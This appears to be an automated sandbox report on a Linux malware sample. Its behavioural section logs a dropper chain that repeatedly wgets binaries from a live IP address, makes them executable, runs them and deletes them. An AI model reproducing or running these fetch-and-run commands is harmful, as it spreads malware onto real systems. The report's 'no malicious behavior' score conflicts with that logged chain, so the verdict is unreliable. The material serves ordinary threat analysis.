Malware Analysis Report

2024-10-10 11:09

Sample ID 240614-lf6ffsybpq
Target a8f8e353270c830f56e946941a4bff39_JaffaCakes118
SHA256 f8de487503f1ed3080384b523d7abcde65ed4db6716e312ec4d9abfb66986af8
Tags
score
1/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
1/10

SHA256

f8de487503f1ed3080384b523d7abcde65ed4db6716e312ec4d9abfb66986af8

Threat Level: No (potentially) malicious behavior was detected

The file a8f8e353270c830f56e946941a4bff39_JaffaCakes118 was found to be: No (potentially) malicious behavior was detected.

Malicious Activity Summary

N/A

MITRE ATT&CK

N/A

Analysis: static1

Detonation Overview

Reported

2024-06-14 09:29

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-14 09:29

Reported

2024-06-14 09:32

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

1s

Max time network

128s

Command Line

[/tmp/a8f8e353270c830f56e946941a4bff39_JaffaCakes118]

Signatures

N/A

Processes

/tmp/a8f8e353270c830f56e946941a4bff39_JaffaCakes118

[/tmp/a8f8e353270c830f56e946941a4bff39_JaffaCakes118]

/usr/bin/wget

[wget http://46.36.37.197/weedntpd]

/bin/chmod

[chmod +x weedntpd]

/tmp/weedntpd

[./weedntpd]

/bin/rm

[rm -rf weedntpd]

/usr/bin/wget

[wget http://46.36.37.197/weedsshd]

/bin/chmod

[chmod +x weedsshd]

/tmp/weedsshd

[./weedsshd]

/bin/rm

[rm -rf weedsshd]

/usr/bin/wget

[wget http://46.36.37.197/weedopenssh]

/bin/chmod

[chmod +x weedopenssh]

/tmp/weedopenssh

[./weedopenssh]

/bin/rm

[rm -rf weedopenssh]

/usr/bin/wget

[wget http://46.36.37.197/weedbash]

/bin/chmod

[chmod +x weedbash]

/tmp/weedbash

[./weedbash]

/bin/rm

[rm -rf weedbash]

/usr/bin/wget

[wget http://46.36.37.197/weedtftp]

/bin/chmod

[chmod +x weedtftp]

/tmp/weedtftp

[./weedtftp]

/bin/rm

[rm -rf weedtftp]

/usr/bin/wget

[wget http://46.36.37.197/weedwget]

/bin/chmod

[chmod +x weedwget]

/tmp/weedwget

[./weedwget]

/bin/rm

[rm -rf weedwget]

/usr/bin/wget

[wget http://46.36.37.197/weedcron]

/bin/chmod

[chmod +x weedcron]

/tmp/weedcron

[./weedcron]

/bin/rm

[rm -rf weedcron]

/usr/bin/wget

[wget http://46.36.37.197/weedftp]

/bin/chmod

[chmod +x weedftp]

/tmp/weedftp

[./weedftp]

/bin/rm

[rm -rf weedftp]

/usr/bin/wget

[wget http://46.36.37.197/weedpftp]

/bin/chmod

[chmod +x weedpftp]

/tmp/weedpftp

[./weedpftp]

/bin/rm

[rm -rf weedpftp]

/usr/bin/wget

[wget http://46.36.37.197/weedsh]

/bin/chmod

[chmod +x weedsh]

/tmp/weedsh

[./weedsh]

/bin/rm

[rm -rf weedsh]

/usr/bin/wget

[wget http://46.36.37.197/weedshit]

/bin/chmod

[chmod +x weedshit]

/tmp/weedshit

[./weedshit]

/bin/rm

[rm -rf weedshit]

/usr/bin/wget

[wget http://46.36.37.197/weedapache2]

/bin/chmod

[chmod +x weedapache2]

/tmp/weedapache2

[./weedapache2]

/bin/rm

[rm -rf weedapache2]

/usr/bin/wget

[wget http://46.36.37.197/weedtelnetd]

/bin/chmod

[chmod +x weedtelnetd]

/tmp/weedtelnetd

[./weedtelnetd]

/bin/rm

[rm -rf weedtelnetd]

Network

Country Destination Domain Proto
CZ 46.36.37.197:80 46.36.37.197 tcp
N/A 224.0.0.251:5353 udp
CZ 46.36.37.197:80 46.36.37.197 tcp
CZ 46.36.37.197:80 46.36.37.197 tcp
CZ 46.36.37.197:80 46.36.37.197 tcp
CZ 46.36.37.197:80 46.36.37.197 tcp
CZ 46.36.37.197:80 46.36.37.197 tcp
GB 185.125.188.61:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.65.91:443 tcp
US 151.101.65.91:443 tcp
CZ 46.36.37.197:80 46.36.37.197 tcp
CZ 46.36.37.197:80 46.36.37.197 tcp
CZ 46.36.37.197:80 46.36.37.197 tcp
CZ 46.36.37.197:80 46.36.37.197 tcp
CZ 46.36.37.197:80 46.36.37.197 tcp
CZ 46.36.37.197:80 46.36.37.197 tcp
CZ 46.36.37.197:80 46.36.37.197 tcp
GB 195.181.164.19:443 tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-14 09:29

Reported

2024-06-14 09:32

Platform

debian9-armhf-20240611-en

Max time network

6s

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

Country Destination Domain Proto
CZ 46.36.37.197:80 46.36.37.197 tcp
CZ 46.36.37.197:80 46.36.37.197 tcp
CZ 46.36.37.197:80 46.36.37.197 tcp
CZ 46.36.37.197:80 46.36.37.197 tcp
CZ 46.36.37.197:80 46.36.37.197 tcp
CZ 46.36.37.197:80 46.36.37.197 tcp
CZ 46.36.37.197:80 46.36.37.197 tcp
CZ 46.36.37.197:80 46.36.37.197 tcp
CZ 46.36.37.197:80 46.36.37.197 tcp
CZ 46.36.37.197:80 46.36.37.197 tcp
CZ 46.36.37.197:80 46.36.37.197 tcp
CZ 46.36.37.197:80 46.36.37.197 tcp
CZ 46.36.37.197:80 46.36.37.197 tcp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-06-14 09:29

Reported

2024-06-14 09:29

Platform

debian9-mipsbe-20240418-en

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-06-14 09:29

Reported

2024-06-14 09:29

Platform

debian9-mipsel-20240611-en

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A